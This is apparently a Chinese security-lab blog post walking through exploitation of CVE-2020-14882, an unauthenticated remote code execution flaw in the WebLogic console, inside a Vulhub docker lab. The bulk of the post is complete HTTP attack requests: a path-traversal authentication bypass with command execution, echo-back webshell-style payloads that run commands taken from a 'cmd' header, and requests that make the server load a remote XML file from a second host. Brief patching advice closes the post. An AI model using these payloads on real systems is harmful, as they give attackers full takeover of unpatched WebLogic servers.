网安引领时代,弥天点亮未来
![eda84491a04005e66ac04f7a7b903193.png](https://i-blog.csdnimg.cn/blog_migrate/60d60e1073de24344c4028c656cf3d71.png)
2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882 ,漏洞等级:严重 ,漏洞评分:9.8 。
远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。
![eda84491a04005e66ac04f7a7b903193.png](https://i-blog.csdnimg.cn/blog_migrate/60d60e1073de24344c4028c656cf3d71.png)
Oracle WeblogicServer 10.3.6.0.0
Oracle WeblogicServer 12.1.3.0.0
Oracle WeblogicServer 12.2.1.3.0
Oracle WeblogicServer 12.2.1.4.0
Oracle WeblogicServer 14.1.1.0.0
![eda84491a04005e66ac04f7a7b903193.png](https://i-blog.csdnimg.cn/blog_migrate/60d60e1073de24344c4028c656cf3d71.png)
虚拟机部署docker安装Vulhub一键搭建漏洞测试靶场环境。
docker-compose up -d
1、访问漏洞环境
http://192.168.60.130:7001/console/login/LoginForm.jsp
2、在漏洞利用时根据不同需求进行Pyload构造。目前有常用的三种:
1.执行payload后不回显,但是已经执行成功。
构造payload执行:
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/yunzui');") HTTP/1.1Host: 192.168.60.130:7001Cache-Control: max-age=0DNT: 1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.60.130:7001/console/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: ADMINCONSOLESESSION=-KSLiFfIosk7pDYFYp701K0Svy9__G8yZefB7whwyLGLvkhjKbTD!-355433482Connection: closeContent-Length: 4
效果查看
或者使用dnslog平台进行验证
生成DNS域名:idvek9.dnslog.cn
构造payload进行执行
效果查看
或者使用python脚本进行漏洞利用
效果查看
2.执行payload后回显
通过GET方式进行payload提交
GET/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThreadcurrentThread = (weblogic.work.ExecuteThread)Thread.currentThread();weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork();java.lang.reflect.Field field =adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Objectobj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req =(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window")? new String[]{"cmd.exe", "/c", cmd} : newString[]{"/bin/sh", "-c", cmd};if(cmd != null ){ Stringresult = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next();weblogic.servlet.internal.ServletResponseImpl res =(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(newweblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();}currentThread.interrupt();') HTTP/1.1Host:192.168.60.130:7001Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/86.0.4240.111 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection: closecmd:idContent-Length: 0
执行:id
通过POST方式进行payload提交
POST/console/css/%252e%252e%252fconsole.portal HTTP/1.1Host:192.168.60.130:7001cmd: idUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/85.0.4183.121 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection: closeContent-Type:application/x-www-form-urlencodedContent-Length: 1258 _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThreadexecuteThread = (weblogic.work.ExecuteThread) Thread.currentThread();weblogic.work.WorkAdapteradapter = executeThread.getCurrentWork();java.lang.reflect.Fieldfield = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj =field.get(adapter);weblogic.servlet.internal.ServletRequestImplreq = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd =req.getHeader("cmd");String[] cmds =System.getProperty("os.name").toLowerCase().contains("window")? new String[]{"cmd.exe", "/c", cmd} : newString[]{"/bin/sh", "-c", cmd};if (cmd != null) { String result = newjava.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res =(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(newweblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write("");}executeThread.interrupt();");
执行:id
3.通过把payload构造为XML格式进行引用
通过DNSLog平台生成域名:
bq11vi.dnslog.cn
执行(GET)
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.60.1/weblogic.xml")HTTP/1.1Host: 192.168.60.130:7001Cache-Control: max-age=0DNT: 1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.60.130:7001/console/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:ADMINCONSOLESESSION=-KSLiFfIosk7pDYFYp701K0Svy9__G8yZefB7whwyLGLvkhjKbTD!-355433482Connection: close
效果查看
执行(POST)
POST /console/images/%252E%252E%252Fconsole.portalHTTP/1.1Host: 192.168.60.130:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-type: application/x-www-form-urlencoded;charset=utf-8Content-Length: 153CMD:whoami _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.60.1/weblogic.xml")
效果查看
![eda84491a04005e66ac04f7a7b903193.png](https://i-blog.csdnimg.cn/blog_migrate/60d60e1073de24344c4028c656cf3d71.png)
1、建议用户及时将 Weblogic 后台/console/console.portal 对外的访问权限暂时关闭。
2、此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。
注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。
0x05参考链接https://www.safedog.cn/news.html?id=4533
http://blog.nsfocus.net/weblogic-console-http-1028/
https://leaderzhang.com/
关注弥天安全实验室微信公众平台,回复weblogic获取POC及Python脚本!
![003170067f2bc6dad455da3abf225dc9.gif](https://i-blog.csdnimg.cn/blog_migrate/6e549246a2823deff8c6454ac779ad92.gif)
知识分享完了
喜欢别忘了关注我们哦~
予以风动,必降弥天之润!弥 天
安全实验室
![e8a2003364ef3b4441677adb8d253978.png](https://i-blog.csdnimg.cn/blog_migrate/08e98bbbaaf2a0259486943b0023f8a6.jpeg)